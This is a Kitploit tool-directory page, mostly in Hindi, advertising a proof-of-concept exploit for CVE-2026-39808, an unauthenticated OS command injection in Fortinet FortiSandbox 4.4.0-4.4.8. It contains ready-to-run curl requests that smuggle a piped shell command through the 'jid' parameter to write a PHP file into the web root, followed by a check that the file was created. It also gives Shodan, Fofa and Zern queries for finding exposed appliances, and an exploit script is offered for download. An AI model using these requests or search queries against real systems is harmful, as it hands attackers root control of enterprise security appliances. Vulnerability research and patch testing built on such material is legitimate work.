Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-39808 — Fortinet FortiSandbox 4.4.0-4.4.8 - OS कमांड इंजेक्शन tracer-behavior एंडपॉइंट के माध्यम से | Kitploit
उपकरण/GitHubGitHub/error-inside/cve-2026-39808
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोललर्निंग और शिक्षा
GitHuberror-inside/cve-2026-39808

CVE-2026-39808

Fortinet FortiSandbox 4.4.0-4.4.8 - OS कमांड इंजेक्शन tracer-behavior एंडपॉइंट के माध्यम से

रिपॉजिटरी देखें
2 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-39808

Python CVSS License Educational

Fortinet FortiSandbox 4.4.0-4.4.8 - tracer-behavior एंडपॉइंट के माध्यम से OS कमांड इंजेक्शन

Fortinet FortiSandbox एक उन्नत खतरा सुरक्षा समाधान है जो संदिग्ध फ़ाइलों, URLs और नेटवर्क ट्रैफ़िक के दुर्भावनापूर्ण व्यवहार का विश्लेषण करने के लिए पृथक वातावरण बनाता है। यह स्टैटिक एनालिसिस, डायनामिक एनालिसिस, AI-संचालित मशीन लर्निंग और FortiGuard से खतरे की खुफिया जानकारी के संयोजन का उपयोग करके जीरो-डे खतरों, एवेसिव मैलवेयर, रैनसमवेयर और लक्षित हमलों का पता लगाता है जो पारंपरिक सिग्नेचर-आधारित सुरक्षा को बायपास करते हैं। उद्यमों को उभरते खतरों — विशेष रूप से अज्ञात मैलवेयर और एडवांस्ड पर्सिस्टेंट थ्रेट्स (APTs) — से बचाने के लिए FortiSandbox तैनात करना चाहिए; यह उत्पादन प्रणालियों तक पहुँचने से पहले संदिग्ध सामग्री को एक सुरक्षित, पृथक वातावरण में स्वचालित रूप से डिटोनेट करके ऐसा करता है। यह व्यापक Fortinet Security Fabric के साथ एकीकृत होता है और विभिन्न नेटवर्क आर्किटेक्चर के अनुरूप फिजिकल एप्लायंस, वर्चुअल मशीन, क्लाउड सेवा या कंटेनराइज्ड समाधान के रूप में तैनात किया जा सकता है।

CVE-2026-39808 एक गंभीर OS कमांड इंजेक्शन भेद्यता है जो FortiSandbox के संस्करण 4.4.0 से 4.4.8 को प्रभावित करती है। यह दोष ओएस कमांड निर्माण (CWE-78) में उपयोग होने से पहले उपयोगकर्ता-नियंत्रित इनपुट में विशेष तत्वों के अनुचित निष्प्रभावीकरण से उत्पन्न होता है, विशेष रूप से एक अज्ञात API एंडपॉइंट को प्रभावित करता है। एक अप्रमाणित हमलावर विशेष रूप से तैयार HTTP अनुरोध भेजकर इस भेद्यता का शोषण कर सकता है, जिससे अंतर्निहित सिस्टम पर रूट विशेषाधिकारों के साथ मनमाने ओएस कमांड निष्पादित हो सकते हैं। सफल शोषण हमलावर को FortiSandbox एप्लायंस पर पूर्ण नियंत्रण देता है, जिससे वे विश्लेषित मैलवेयर नमूनों तक पहुँच सकते हैं, संवेदनशील कॉन्फ़िगरेशन डेटा निकाल सकते हैं, जुड़े नेटवर्क सेगमेंट में पिवट कर सकते हैं, या उद्यम वातावरण में आगे पार्श्व आंदोलन के लिए समझौता किए गए डिवाइस को एक पैर जमाने के रूप में उपयोग कर सकते हैं। इस भेद्यता का वास्तविक दुनिया में सक्रिय रूप से शोषण किया जा रहा है।

PoC

root@kitploit:~
# Step 1 — inject: write a marker string to a temp .php file via pipe in jid param
# Decoded payload: |(echo canary > /web/ng/proof.php)|
curl -sk -o /dev/null -w "%{http_code}" \
  "http://example.com/fortisandbox/job-detail/tracer-behavior?jid=%7c%28echo+canary+%3e+%2fweb%2fng%2fproof.php%29%7c" \
  -H "User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)" \
  -H "Connection: close"

# Step 2 — verify: fetch the dropped file and check for the marker
curl -sk "http://example.com/ng/proof.php" \
  -H "User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)" \
  -H "Connection: close"

Usage

root@kitploit:~
python CVE-2026-39808-X7.py
  • Zern : title:FortiSandbox
  • Fofa : title="FortiSandbox"
  • Shodan : http.title:FortiSandbox

Reources

  • OpenCVE - CVE-2026-39808 - FortiSandbox 4.4.x रिलीज़ में OS कमांड इंजेक्शन
  • NIST - CVE-2026-39808 विस्तार
  • Fortinet FortiSandbox

अस्वीकरण

यह रिपॉजिटरी और इसकी सामग्री विशेष रूप से वैध सुरक्षा अनुसंधान, अधिकृत पेनिट्रेशन टेस्टिंग, शैक्षिक अध्ययन और रक्षात्मक उद्देश्यों के लिए प्रदान की गई है। इस सामग्री तक पहुँच या उपयोग करके, आप पूर्ण जिम्मेदारी स्वीकार करते हैं कि आपकी गतिविधियाँ सभी लागू कानूनों का अनुपालन करती हैं और आपने किसी भी ऐसी प्रणाली का परीक्षण या इन तकनीकों को लागू करने से पहले जिसके आप मालिक नहीं हैं, उचित प्राधिकरण प्राप्त किया है।

इस परियोजना के लेखक और अनुरक्षक इस जानकारी के अनुप्रयोग से होने वाली किसी भी क्षति, कानूनी परिणामों या दुरुपयोग के लिए कोई दायित्व नहीं मानते हैं। अनधिकृत पहुँच, दुर्भावनापूर्ण गतिविधि या अवैध उद्देश्यों के लिए कोई भी उपयोग स्पष्ट रूप से निषिद्ध और असमर्थित है।

जिम्मेदारी से उपयोग करें। कानूनी बने रहें। केवल वही परीक्षण करें जो आपके पास है या जिसके लिए आपके पास स्पष्ट लिखित अनुमति है।

लेखक

  • ErrorInside // SCT

लाइसेंस

SCT-PL

टूल डाउनलोड करें